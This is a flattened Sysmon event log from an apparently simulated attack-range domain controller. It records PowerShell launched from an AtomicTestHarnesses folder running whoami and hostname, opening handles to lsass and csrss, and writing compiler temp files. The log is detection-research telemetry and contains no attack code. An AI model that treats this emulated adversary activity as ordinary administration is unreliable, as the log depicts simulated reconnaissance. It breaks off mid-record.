@"C:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002243771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.951{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.cmdline2021-03-02 16:56:10.951 11241100x80000000000000002243770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.localDLL2021-03-02 16:56:10.951{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\pwfzeeqj\pwfzeeqj.dll2021-03-02 16:56:10.951 10341000x80000000000000002243769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.765{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E2A-603E-F3AA-00000000AD01}9192C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.748{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.748{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.748{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.748{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.748{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6E2A-603E-F3AA-00000000AD01}9192C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.748{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E2A-603E-F3AA-00000000AD01}9192C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64) 154100x80000000000000002243762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.761{05ADC7E1-6E2A-603E-F3AA-00000000AD01}9192C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000002243761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.748{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E2A-603E-F2AA-00000000AD01}13084C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.733{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.733{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.733{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.733{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.733{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6E2A-603E-F2AA-00000000AD01}13084C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.733{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E2A-603E-F2AA-00000000AD01}13084C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64) 154100x80000000000000002243754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.744{05ADC7E1-6E2A-603E-F2AA-00000000AD01}13084C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002243753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:10.248{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2717FB34954778201D80D14F37AFD5CC,SHA256=261238B55A5DC00AA9FBD772F64794D5C634F743540CD340A9322A7014C8AC68,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.968{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.967{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.919{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.919{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002243827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:56:11.896{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064\PSHost.132591777717911605.14064.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002243826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.886{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EF9CDCBAA3D189AB1A3843AAFD2C7F07,SHA256=46C466ED9F7E442234032D1B1D26DB3BE9D2BB86F1238DE3E34B7692D672C730,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:11.877{05ADC7E1-6E2B-603E-F7AA-00000000AD01}14064ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_f0u5gbbj.toe.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 